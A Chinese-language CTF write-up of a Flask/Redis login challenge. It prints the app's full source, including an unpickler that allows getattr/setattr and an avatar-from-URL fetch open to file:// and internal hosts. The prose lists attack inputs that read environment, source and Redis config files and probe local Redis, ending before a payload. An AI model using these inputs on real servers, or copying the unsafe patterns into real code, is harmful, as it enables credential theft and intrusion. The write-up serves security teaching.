auth

因为题目环境关了所以无法完整准确复现,以下是主要思路

首先注册一个账号,检查功能点发现/profile/avatar可以URL下载,使用file://协议可以读取本地文件

通过读取环境变量file:///proc/self/environ
可以得知工作目录在/app

读取源码: file:///app/app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
from flask import Flask, request, jsonify, render_template_string, session, redirect, url_for
import redis
import pickle
import requests
import base64
import os
import io
import datetime
import urllib.request
import urllib.error
import secrets
import json

app = Flask(__name__, static_folder='static', static_url_path='/static')

def render_page(title, content, username=None, role=None, show_nav=True):
    """Build the complete HTML page shared by every view.

    Args:
        title: Page title. Treated as plain text and HTML-escaped.
        content: Main body. Already-rendered HTML, inserted verbatim.
        username: Current user name (optional). HTML-escaped.
        role: Current user role (optional); 'admin' adds the admin links.
        show_nav: Whether to render the navigation menu (default True).

    Returns:
        The HTML document as a string.
    """
    from html import escape

    # Everything except `content` is plain text that may originate from user
    # input (e.g. the registered username), so escape it before embedding.
    safe_title = escape(str(title))
    safe_username = escape(str(username))
    safe_role = escape(str(role))

    # Navigation menu
    nav_menu = ''
    if show_nav:
        if username:
            nav_menu = '''
<nav>
<ul>
<li><a href="/home">用户中心</a></li>
<li><a href="/profile">个人属性</a></li>
'''

            if role == 'admin':
                nav_menu += '''
<li><a href="/admin/online-users">在线用户</a></li>
<li><a href="/admin/users">注册用户</a></li>
'''

            nav_menu += '''
<li><a href="/logout">退出登录</a></li>
</ul>
</nav>
'''
        else:
            nav_menu = '''
<nav>
<ul>
<li><a href="/login">登录</a></li>
<li><a href="/register">注册</a></li>
</ul>
</nav>
'''

    # Greeting banner, only for a logged-in user
    user_info = ''
    if username:
        user_info = f'<div class="user-info">欢迎, {safe_username}! (角色: {safe_role})</div>'

    page = f'''
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{safe_title} - auth</title>
<link rel="stylesheet" href="/static/style.css">
<link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🔒</text></svg>">
</head>
<body>
<div class="container">
<header>
<h1>{safe_title}</h1>
{user_info}
</header>

{nav_menu}

<main>
{content}
</main>

<footer>
<p>© 2026 auth | 简约安全设计</p>
</footer>
</div>

<script src="/static/script.js"></script>
</body>
</html>
'''
    return page

class User:
    """Registered account record; every new user starts with the "user" role."""

    def __init__(self, username, password=None):
        self.username, self.password = username, password
        self.role = "user"
        self.created_at = "2026-01-20"

    def __repr__(self):
        # The password is deliberately left out of the representation.
        return "User(username={!r}, role={!r})".format(self.username, self.role)


class OnlineUser:
    """Login-state record that is pickled into Redis when a user logs in."""

    def __init__(self, username, role="user"):
        self.username = username
        self.role = role
        # Take a single timestamp so that expiry_time is exactly one hour
        # after login_time (two now() calls can straddle a second boundary).
        now = datetime.datetime.now()
        self.login_time = now.strftime("%Y-%m-%d %H:%M:%S")
        self.expiry_time = (now + datetime.timedelta(hours=1)).strftime("%Y-%m-%d %H:%M:%S")
        # `request` is falsy outside a Flask request context.
        self.ip_address = request.remote_addr if request else "unknown"

    def __repr__(self):
        return f"OnlineUser(username={self.username!r}, role={self.role!r}, login_time={self.login_time!r}, expiry_time={self.expiry_time!r})"


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves OnlineUser and a few named builtins.

    NOTE(security): the builtin allow-list contains ``getattr`` and
    ``setattr``. Together with any allowed class these let a crafted pickle
    walk to arbitrary objects (for example ``__init__.__globals__``), so this
    class is NOT a safe sandbox for untrusted data. A pickled OnlineUser does
    not need either of them; drop them (or switch to a data-only format such
    as JSON) before exposing this to untrusted input.
    """

    # Looked up by "<module>.<name>". The bare 'builtins' key can never match
    # such a name; it is kept only so the attribute's contents are unchanged.
    ALLOWED_CLASSES = {
        '__main__.OnlineUser': OnlineUser,
        'builtins': __builtins__
    }

    def find_class(self, module: str, name: str):
        """Resolve a global referenced by the pickle stream.

        Args:
            module: Module name recorded in the pickle.
            name: Attribute name recorded in the pickle.

        Returns:
            The allowed object.

        Raises:
            pickle.UnpicklingError: If the global is not on the allow-list.
        """
        # `__builtins__` is a module only inside __main__; in any imported
        # module it is a plain dict and getattr() on it fails. The `builtins`
        # module works in both cases.
        import builtins

        full_name = f"{module}.{name}"

        # Selected names from the builtins module
        if module == "builtins" and name in ("getattr", "setattr", "dict", "list", "tuple"):
            return getattr(builtins, name)

        # Allow-list check
        if full_name in self.ALLOWED_CLASSES:
            return self.ALLOWED_CLASSES[full_name]

        raise pickle.UnpicklingError(f"Class '{full_name}' is not allowed")


# Redis configuration
CONFIG_FILE_PATH = '/opt/app_config/redis_config.json'

# Default values, used when the config file is missing or cannot be read
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_PASSWORD = '123456'

# Try to load overrides from the config file
try:
    if os.path.exists(CONFIG_FILE_PATH):
        print(f"从配置文件读取Redis配置: {CONFIG_FILE_PATH}")
        with open(CONFIG_FILE_PATH, 'r') as config_file:
            config = json.load(config_file)

        # Take each value from the file, falling back to the default above
        REDIS_HOST = config.get('redis_host', REDIS_HOST)
        REDIS_PORT = config.get('redis_port', REDIS_PORT)
        REDIS_PASSWORD = config.get('redis_password', REDIS_PASSWORD)

        print(f"配置文件读取成功: host={REDIS_HOST}, port={REDIS_PORT}")

        # The config file is removed once it has been read; a failure to
        # remove it is only reported, not fatal.
        try:
            os.remove(CONFIG_FILE_PATH)
            print(f"配置文件已删除: {CONFIG_FILE_PATH}")
        except Exception as delete_error:
            print(f"警告:无法删除配置文件 {CONFIG_FILE_PATH}: {delete_error}")
    else:
        print(f"配置文件不存在: {CONFIG_FILE_PATH},使用默认Redis配置")
except Exception as config_error:
    print(f"配置文件读取失败: {config_error},使用默认Redis配置")

# Connect to Redis
try:
    r = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, decode_responses=False)
    r.ping()
    print(f"Redis连接成功: {REDIS_HOST}:{REDIS_PORT}")

    # Load the Flask secret key from Redis, generating it on first start
    SECRET_KEY_REDIS_KEY = 'app:secret_key'
    secret_key = r.get(SECRET_KEY_REDIS_KEY)
    if secret_key is None:
        # Generate a new random key (64 hexadecimal characters)
        secret_key = secrets.token_hex(32)
        r.set(SECRET_KEY_REDIS_KEY, secret_key)
        print(f"已生成新的随机secret_key并保存到Redis: {SECRET_KEY_REDIS_KEY}")
    else:
        # Redis returns bytes here (decode_responses=False); decode to str
        if isinstance(secret_key, bytes):
            secret_key = secret_key.decode('utf-8')
        print(f"从Redis加载现有的secret_key: {SECRET_KEY_REDIS_KEY}")

    # Install the key on the Flask application
    app.secret_key = secret_key
    print(f"Flask secret_key已设置(长度: {len(secret_key)})")

except Exception as e:
    # NOTE(review): on this path app.secret_key is never assigned, and r is
    # set to None so the views can detect the missing connection.
    print(f"Redis连接失败: {e}")
    r = None


@app.route('/')
def index():
    """Redirect the site root to the login page."""
    return redirect(url_for('login'))


@app.route('/login', methods=['GET', 'POST'])
def login():
    """Show the login form (GET) or authenticate submitted credentials (POST).

    On success the session receives username/logged_in/role, a pickled
    OnlineUser record is stored in Redis for one hour, and the client is
    redirected to /home. On failure a plain-text message is returned.
    """
    import hmac

    if request.method == 'POST':
        username = request.form.get('username', '')
        password = request.form.get('password', '')

        if not username or not password:
            return '用户名和密码不能为空'

        # Nothing can be verified without the Redis connection
        if r is None:
            return 'Redis连接失败,无法验证用户'

        # NOTE(security): the stored value is the plain-text password, not a
        # hash. Migrating to a salted hash needs a matching change in
        # register() and a data migration, so it is only flagged here.
        stored_password = r.hget(f'user:{username}', 'password')
        if stored_password is None:
            return '用户不存在或密码错误'

        # Constant-time comparison on bytes: avoids a timing side channel and
        # cannot raise UnicodeDecodeError on a non-UTF-8 stored value.
        if not hmac.compare_digest(stored_password, password.encode('utf-8')):
            return '用户不存在或密码错误'

        # Login succeeded: populate the session
        session['username'] = username
        session['logged_in'] = True

        # Role defaults to 'user' when the hash has no role field
        role_data = r.hget(f'user:{username}', 'role')
        role = role_data.decode('utf-8') if role_data else 'user'
        session['role'] = role

        online_user = OnlineUser(username, role)
        serialized_user = pickle.dumps(online_user)
        r.set(f'online_user:{username}', serialized_user, ex=3600)  # expires after 1 hour

        return redirect(url_for('home'))

    login_form = '''
<div class="form-container">
<h2>用户登录</h2>
<form method="post" class="login-form">
<div class="form-group">
<label for="username">用户名</label>
<input type="text" id="username" name="username" required placeholder="请输入用户名">
</div>
<div class="form-group">
<label for="password">密码</label>
<input type="password" id="password" name="password" required placeholder="请输入密码">
</div>
<div class="form-group">
<button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">登录</button>
</div>
</form>
<div class="text-center mt-20">
<p>还没有账号? <a href="/register" class="btn btn-secondary btn-small">注册新账户</a></p>
</div>
</div>
'''

    return render_page('登录', login_form, show_nav=False)


# User registration
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Show the registration form (GET) or create a new account (POST).

    The account is stored as the Redis hash ``user:<username>`` with role
    'user'. Validation failures are reported as plain-text messages.
    """
    from html import escape

    if request.method == 'POST':
        username = request.form.get('username', '')
        password = request.form.get('password', '')
        confirm_password = request.form.get('confirm_password', '')
        name = request.form.get('name', '')
        age = request.form.get('age', '')
        phone = request.form.get('phone', '')

        if not username or not password:
            return '用户名和密码不能为空'

        if password != confirm_password:
            return '两次输入的密码不一致'

        if r is None:
            return 'Redis连接失败,无法注册用户'

        # Refuse to overwrite an existing account
        if r.hexists(f'user:{username}', 'password'):
            return '用户名已存在'

        user_data = {
            'password': password,
            'role': 'user',
            'created_at': '2026-01-20',
            'name': name if name else username,  # defaults to the username
            'age': age if age else '0',
            'phone': phone if phone else '未填写',
            'avatar': ''  # no avatar by default
        }

        r.hset(f'user:{username}', mapping=user_data)

        # The username is attacker-controlled and reflected into HTML below,
        # so it must be escaped.
        success_content = f'''
<div class="message message-success">
<h3>注册成功!</h3>
<p>用户 <strong>{escape(username)}</strong> 已成功注册。</p>
<p><a href="/login" class="btn btn-success mt-10">前往登录</a></p>
</div>
'''
        return render_page('注册成功', success_content, show_nav=False)

    register_form = '''
<div class="form-container">
<h2>用户注册</h2>
<form method="post" class="register-form">
<div class="form-group">
<label for="username">用户名 <span class="required">*</span></label>
<input type="text" id="username" name="username" required placeholder="请输入用户名">
</div>

<div class="form-group">
<label for="password">密码 <span class="required">*</span></label>
<input type="password" id="password" name="password" required placeholder="请输入密码">
</div>

<div class="form-group">
<label for="confirm_password">确认密码 <span class="required">*</span></label>
<input type="password" id="confirm_password" name="confirm_password" required placeholder="请再次输入密码">
</div>

<div class="form-group">
<label for="name">姓名</label>
<input type="text" id="name" name="name" placeholder="可选,默认为用户名">
</div>

<div class="form-group">
<label for="age">年龄</label>
<input type="number" id="age" name="age" min="0" max="150" placeholder="可选">
</div>

<div class="form-group">
<label for="phone">手机号码</label>
<input type="tel" id="phone" name="phone" placeholder="可选">
</div>

<div class="form-group">
<button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">注册</button>
</div>
</form>

<div class="text-center mt-20">
<p>已有账号? <a href="/login" class="btn btn-secondary btn-small">返回登录</a></p>
</div>
</div>
'''

    return render_page('注册', register_form, show_nav=False)


@app.route('/home')
def home():
    """Render the user dashboard; anonymous visitors are sent to /login."""
    from html import escape

    if not session.get('logged_in'):
        return redirect(url_for('login'))

    username = session.get('username', '访客')
    role = session.get('role', 'user')

    # Session values end up inside HTML, so escape them for display.
    safe_username = escape(str(username))
    safe_role = escape(str(role))

    main_content = f'''
<div class="dashboard">
<div class="welcome-message">
<h2>欢迎回来,{safe_username}!</h2>
<p class="role-badge">角色: <span class="badge">{safe_role}</span></p>
</div>

<div class="dashboard-cards">
<div class="card">
<h3>个人信息</h3>
<p>查看和编辑您的个人资料,包括头像上传</p>
<a href="/profile" class="btn btn-success mt-10">管理个人信息</a>
</div>
'''

    # Extra card with the user-management links, admins only
    if role == 'admin':
        main_content += '''
<div class="card">
<h3>用户管理</h3>
<p>管理系统中的用户</p>
<div class="flex flex-column gap-10 mt-10">
<a href="/admin/online-users" class="btn btn-small">在线用户</a>
<a href="/admin/users" class="btn btn-small">注册用户</a>
</div>
</div>
'''

    main_content += '''
</div>

<div class="quick-actions mt-30">
<h3>快速操作</h3>
<div class="flex gap-10">
<a href="/logout" class="btn btn-danger">退出登录</a>
</div>
</div>
</div>
'''

    return render_page('用户中心', main_content, username, role)


@app.route('/admin/online-users')
def admin_online_users():
    """List every ``online_user:*`` record stored in Redis (admin only).

    Each record is unpickled with RestrictedUnpickler and shown as a table
    row; a record that fails to load is shown as an error row instead.
    """
    from html import escape

    if not session.get('logged_in'):
        return redirect(url_for('login'))

    if session.get('role') != 'admin':
        return '权限不足,需要管理员权限'

    if r is None:
        return 'Redis连接失败'

    # Collect the keys of all online-user records
    online_keys = r.keys('online_user:*')

    if not online_keys:
        return '没有在线用户'

    users_html = '<h1>在线用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">'
    users_html += '<tr><th>用户名</th><th>角色</th><th>登录时间</th><th>失效时间</th><th>IP地址</th><th>状态</th></tr>'

    for key in online_keys:
        try:
            serialized = r.get(key)
            if serialized:
                # NOTE(security): this unpickles whatever bytes are stored
                # under the key. Anyone able to write to Redis controls the
                # input, and RestrictedUnpickler's allow-list (getattr /
                # setattr) is not a safe sandbox.
                buffer = io.BytesIO(serialized)
                online_user = RestrictedUnpickler(buffer).load()

                expiry_time = datetime.datetime.strptime(online_user.expiry_time, "%Y-%m-%d %H:%M:%S")
                current_time = datetime.datetime.now()
                status = '在线' if current_time < expiry_time else '已过期'
                status_color = 'green' if status == '在线' else 'red'

                # Fields come from deserialized data: escape before rendering.
                users_html += f'''
<tr>
<td>{escape(str(online_user.username))}</td>
<td>{escape(str(online_user.role))}</td>
<td>{escape(str(online_user.login_time))}</td>
<td>{escape(str(online_user.expiry_time))}</td>
<td>{escape(str(online_user.ip_address))}</td>
<td style="color: {status_color}">{status}</td>
</tr>
'''
        except Exception as e:
            # One broken record must not hide the rest of the table.
            users_html += f'<tr><td colspan="6">反序列化错误: {escape(str(e))}</td></tr>'

    users_html += '</table>'

    # Current user, needed by render_page for the header and menu
    current_username = session.get('username', '')
    current_role = session.get('role', '')

    users_html += '''
<div class="admin-actions mt-30">
<a href="/admin/users" class="btn btn-secondary">查看注册用户</a>
<a href="/home" class="btn">返回用户中心</a>
</div>
'''

    return render_page('在线用户管理', users_html, current_username, current_role)


@app.route('/admin/users')
def admin_users():
    """List every registered ``user:*`` hash stored in Redis (admin only)."""
    from html import escape

    if not session.get('logged_in'):
        return redirect(url_for('login'))

    if session.get('role') != 'admin':
        return '权限不足,需要管理员权限'

    if r is None:
        return 'Redis连接失败'

    # Collect the keys of all user records
    user_keys = r.keys('user:*')

    if not user_keys:
        return '没有注册用户'

    users_html = '<h1>注册用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">'
    users_html += '<tr><th>用户名</th><th>角色</th><th>姓名</th><th>年龄</th><th>手机号码</th><th>创建时间</th></tr>'

    prefix = 'user:'
    for key in user_keys:
        try:
            user_data = r.hgetall(key)
            if user_data:
                # Redis returns bytes (decode_responses=False): decode both
                # field names and values.
                user_info = {
                    (field.decode('utf-8') if isinstance(field, bytes) else field):
                    (value.decode('utf-8') if isinstance(value, bytes) else value)
                    for field, value in user_data.items()
                }

                key_str = key.decode('utf-8') if isinstance(key, bytes) else key
                # Strip only the leading prefix; str.replace() would also
                # delete any "user:" occurring inside the username itself.
                username = key_str[len(prefix):] if key_str.startswith(prefix) else key_str
                role = user_info.get('role', 'user')
                name = user_info.get('name', username)
                age = user_info.get('age', '0')
                phone = user_info.get('phone', '未填写')
                created_at = user_info.get('created_at', '未知')

                # Every field is user-supplied at registration or profile
                # edit, so escape it to prevent stored XSS against the admin.
                users_html += f'''
<tr>
<td>{escape(str(username))}</td>
<td>{escape(str(role))}</td>
<td>{escape(str(name))}</td>
<td>{escape(str(age))}</td>
<td>{escape(str(phone))}</td>
<td>{escape(str(created_at))}</td>
</tr>
'''
        except Exception as e:
            # One broken record must not hide the rest of the table.
            users_html += f'<tr><td colspan="6">获取用户信息错误: {escape(str(e))}</td></tr>'

    users_html += '</table>'

    current_username = session.get('username', '')
    current_role = session.get('role', '')

    users_html += '''
<div class="admin-actions mt-30">
<a href="/admin/online-users" class="btn btn-secondary">查看在线用户</a>
<a href="/home" class="btn">返回用户中心</a>
</div>
'''

    return render_page('注册用户管理', users_html, current_username, current_role)


@app.route('/profile')
def profile():
    """Render the logged-in user's profile from the ``user:<name>`` hash."""
    from html import escape

    if not session.get('logged_in'):
        return redirect(url_for('login'))

    username = session.get('username', '')
    if not username or r is None:
        return '无法获取用户信息'

    # Load the user record from Redis
    user_data = r.hgetall(f'user:{username}')
    if not user_data:
        return '用户信息不存在'

    # Redis returns bytes (decode_responses=False): decode keys and values
    user_info = {
        (key.decode('utf-8') if isinstance(key, bytes) else key):
        (value.decode('utf-8') if isinstance(value, bytes) else value)
        for key, value in user_data.items()
    }

    name = user_info.get('name', username)
    age = user_info.get('age', '0')
    phone = user_info.get('phone', '未填写')
    avatar = user_info.get('avatar', '')
    role = user_info.get('role', 'user')
    created_at = user_info.get('created_at', '未知')

    # Only http(s) avatars are shown; any other stored value is ignored
    if avatar.startswith(('http://', 'https://')):
        avatar_src = avatar
    else:
        avatar_src = ''

    # All values below are user-supplied, so escape them; escape() also
    # escapes quotes, which matters for the src attribute.
    profile_content = f'''
<div class="profile-container">
<div class="profile-header">
<h2>个人资料</h2>
<p>查看和管理您的个人信息</p>
</div>

<div class="profile-content">
<div class="profile-avatar-section">
<div class="avatar-preview">
<img src="{escape(avatar_src)}" alt="用户头像" id="profile-avatar">
</div>
<div class="avatar-actions">
<a href="/profile/avatar" class="btn btn-success">更换头像</a>
</div>
</div>

<div class="profile-info-section">
<h3>基本信息</h3>
<table class="profile-info-table">
<tr>
<th>用户名</th>
<td>{escape(str(username))}</td>
</tr>
<tr>
<th>姓名</th>
<td>{escape(str(name))}</td>
</tr>
<tr>
<th>年龄</th>
<td>{escape(str(age))}</td>
</tr>
<tr>
<th>手机号码</th>
<td>{escape(str(phone))}</td>
</tr>
<tr>
<th>角色</th>
<td><span class="badge">{escape(str(role))}</span></td>
</tr>
<tr>
<th>注册时间</th>
<td>{escape(str(created_at))}</td>
</tr>
</table>

<div class="profile-actions mt-30">
<a href="/profile/edit" class="btn btn-success">编辑个人资料</a>
<a href="/home" class="btn btn-secondary">返回用户中心</a>
</div>
</div>
</div>
</div>
'''

    return render_page('个人属性', profile_content, username, role)


# Edit profile
@app.route('/profile/edit', methods=['GET', 'POST'])
def edit_profile():
    """Show the profile edit form (GET) or store the submitted fields (POST).

    Only name, age and phone can be changed; empty fields are left as they
    are, and the other fields of the hash are never written here.
    """
    from html import escape

    if not session.get('logged_in'):
        return redirect(url_for('login'))

    username = session.get('username', '')
    if not username or r is None:
        return '无法获取用户信息'

    if request.method == 'POST':
        name = request.form.get('name', '')
        age = request.form.get('age', '')
        phone = request.form.get('phone', '')

        # Age, when given, must be numeric
        if age and not age.isdigit():
            return '年龄必须是数字'

        # The account must still exist
        if not r.hgetall(f'user:{username}'):
            return '用户信息不存在'

        # Write only the fields that were actually submitted
        submitted = (('name', name), ('age', age), ('phone', phone))
        updates = {field: value for field, value in submitted if value}
        if updates:
            r.hset(f'user:{username}', mapping=updates)

        return redirect(url_for('profile'))

    # GET: load the current values to pre-fill the form
    user_data = r.hgetall(f'user:{username}')
    if not user_data:
        return '用户信息不存在'

    # Redis returns bytes (decode_responses=False): decode keys and values
    user_info = {
        (key.decode('utf-8') if isinstance(key, bytes) else key):
        (value.decode('utf-8') if isinstance(value, bytes) else value)
        for key, value in user_data.items()
    }

    # The values land inside value="..." attributes; escape() also escapes
    # quotes, so a stored value cannot break out of the attribute.
    current_name = escape(str(user_info.get('name', username)))
    current_age = escape(str(user_info.get('age', '0')))
    current_phone = escape(str(user_info.get('phone', '未填写')))

    edit_form = f'''
<div class="form-container">
<h2>编辑个人资料</h2>
<p>更新您的个人信息</p>

<form method="post" class="edit-form">
<div class="form-group">
<label for="name">姓名</label>
<input type="text" id="name" name="name" value="{current_name}" placeholder="请输入您的姓名">
</div>

<div class="form-group">
<label for="age">年龄</label>
<input type="number" id="age" name="age" value="{current_age}" min="0" max="150" placeholder="请输入您的年龄">
</div>

<div class="form-group">
<label for="phone">手机号码</label>
<input type="tel" id="phone" name="phone" value="{current_phone}" placeholder="请输入您的手机号码">
</div>

<div class="form-group">
<button type="submit" class="btn btn-success">保存修改</button>
<a href="/profile" class="btn btn-secondary" style="margin-left: 15px;">取消</a>
</div>
</form>

<div class="additional-actions mt-30">
<h3>其他操作</h3>
<div class="flex gap-10">
<a href="/profile/avatar" class="btn btn-small">更换头像</a>
<a href="/profile" class="btn btn-small">返回个人资料</a>
<a href="/home" class="btn btn-small">返回用户中心</a>
</div>
</div>
</div>
'''

    return render_page('编辑个人属性', edit_form, username, session.get('role', 'user'))


# Log out
@app.route('/logout')
def logout():
    """Clear the Flask session and redirect to the login page."""
    # NOTE(review): only the session is cleared; no Redis key is touched
    # here, so a stored online_user:<username> record is left in place.
    session.clear()
    return redirect(url_for('login'))


# Avatar upload
@app.route('/profile/avatar', methods=['GET', 'POST'])
def upload_avatar():
    """Show the avatar form (GET) or process an avatar submission (POST).

    POST supports two modes selected by ``upload_type``: a file upload
    (validated, but not implemented yet) and "download from URL", which
    fetches the URL server-side, stores the URL as the user's avatar and
    shows the fetched bytes as a base64 data-URI preview.
    """
    from html import escape

    # Login required
    if not session.get('logged_in'):
        return redirect(url_for('login'))

    username = session.get('username', '')
    if not username or r is None:
        return '无法获取用户信息'

    if request.method == 'GET':
        # Show the upload form
        upload_form = f'''
<div class="upload-container">
<h2>上传头像</h2>
<div class="user-info mb-20">
<p><strong>当前用户:</strong> {escape(str(username))}</p>
</div>

<div class="upload-options">
<div class="upload-option">
<h3>方式一:上传图片文件</h3>
<div class="upload-form-card">
<form method="post" enctype="multipart/form-data" class="upload-form">
<div class="form-group">
<label for="avatar_file">选择图片文件</label>
<input type="file" id="avatar_file" name="avatar_file" accept="image/*" class="file-input">
<p class="help-text">支持 JPG, PNG, GIF 等图片格式</p>
</div>
<div class="form-group">
<button type="submit" name="upload_type" value="上传文件" class="btn btn-success">上传文件</button>
</div>
</form>
</div>
</div>

<div class="upload-option">
<h3>方式二:提供图片URL</h3>
<div class="upload-form-card">
<form method="post" class="upload-form">
<div class="form-group">
<label for="avatar_url">图片URL地址</label>
<input type="text" id="avatar_url" name="avatar_url" placeholder="请输入图片URL地址" class="url-input">
<p class="help-text">请输入有效的图片URL地址</p>
</div>
<div class="form-group">
<button type="submit" name="upload_type" value="从URL下载" class="btn btn-success">从URL下载</button>
</div>
</form>
</div>
</div>
</div>

<div class="upload-note mt-30">
<div class="message">
<p><strong>注意:</strong>上传的头像将显示在您的个人资料中。</p>
</div>
</div>

<div class="upload-actions mt-30">
<a href="/profile" class="btn btn-secondary">返回个人属性</a>
</div>
</div>
'''

        return render_page('上传头像', upload_form, username, session.get('role', 'user'))

    # POST handling
    upload_type = request.form.get('upload_type')

    if upload_type == '上传文件':
        # File upload: validate the submission, then report "not implemented"
        if 'avatar_file' not in request.files:
            return '请选择要上传的文件'

        file = request.files['avatar_file']
        if file.filename == '':
            return '请选择有效的文件'

        # Only image content types are accepted
        if file.content_type and not file.content_type.startswith('image/'):
            return '只能上传图片文件'

        return '功能尚未开发'

    elif upload_type == '从URL下载':
        url = request.form.get('avatar_url', '')
        if not url:
            return '请提供图片URL'

        try:
            # NOTE(security): the URL is fetched server-side without any
            # restriction on scheme or host, so file:// URLs and internal
            # services are reachable (SSRF / local file read). Restrict to
            # http/https and to public hosts before exposing this endpoint.
            req = urllib.request.Request(url)

            # The context manager closes the response even if read() fails
            with urllib.request.urlopen(req, timeout=10) as response:
                response_data = response.read()
                content_type = response.headers.get('Content-Type', '')

            r.hset(f'user:{username}', 'avatar', url)

            base64_data = base64.b64encode(response_data).decode('utf-8')

            # Build the data URI; fall back to image/png when the response
            # has no Content-Type. The header is set by the remote side, so
            # escape it before it goes into the src attribute.
            display_content_type = content_type if content_type else 'image/png'
            data_uri = f'data:{escape(display_content_type)};base64,{base64_data}'

            # Same preview page for every response type
            unified_content = f'''
<div class="message">
<h2>图片预览</h2>

<div class="image-preview-container mt-20">
<div class="image-wrapper">
<img src="{data_uri}" alt="加载图片图片" style="max-width: 100%; max-height: 500px; border: 1px solid #ddd; border-radius: 4px;">
</div>
</div>

<div class="preview-actions mt-30">
<a href="/profile" class="btn btn-success">查看个人属性</a>
<a href="/profile/avatar" class="btn btn-secondary">继续上传</a>
</div>
</div>
'''

            return render_page('图片预览', unified_content, username, session.get('role', 'user'))

        except Exception as e:
            # Any fetch or storage failure becomes an error page; the message
            # may echo remote data, so it is escaped.
            error_content = f'''
<div class="message message-error">
<h2>处理失败</h2>
<div class="error-details">
<p><strong>错误信息:</strong> {escape(str(e))}</p>
</div>
<div class="error-actions mt-20">
<a href="/profile/avatar" class="btn btn-secondary">返回上传页面</a>
</div>
</div>
'''

            return render_page('处理失败', error_content, username, session.get('role', 'user'))

    else:
        return '无效的上传类型'



# Script entry point: serve on all interfaces, port 5000, debug mode off.
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000, debug=False)

简单审计发现 /admin/online-users 存在受限的 pickle 反序列化点,但利用它需要 admin 账号,并且需要先向 Redis 中的 online_user:* 键(例如 online_user:test)写入 pickle 序列化数据。

同时根据源码,远程服务器上显然运行着 Redis 服务,但 REDIS_HOST、REDIS_PORT、REDIS_PASSWORD 可能并非源码中的默认值(启动时会被 /opt/app_config/redis_config.json 中的配置覆盖,且该文件读取后即被删除)

起初以为密码就是123456试了半天

通过读取redis配置信息可以得到密码: file:///etc/redis/redis.conf

当我们的url为http://127.0.0.1:6379时,会发现报错-ERR wrong number of arguments for 'get' command,说明redis确实开放在本地6379端口

urllib.request.urlopen 本身不支持 dict://、gopher:// 协议,因此无法直接用这些协议与 Redis 交互

观察响应包可以看出 Python 版本为 3.7.3。
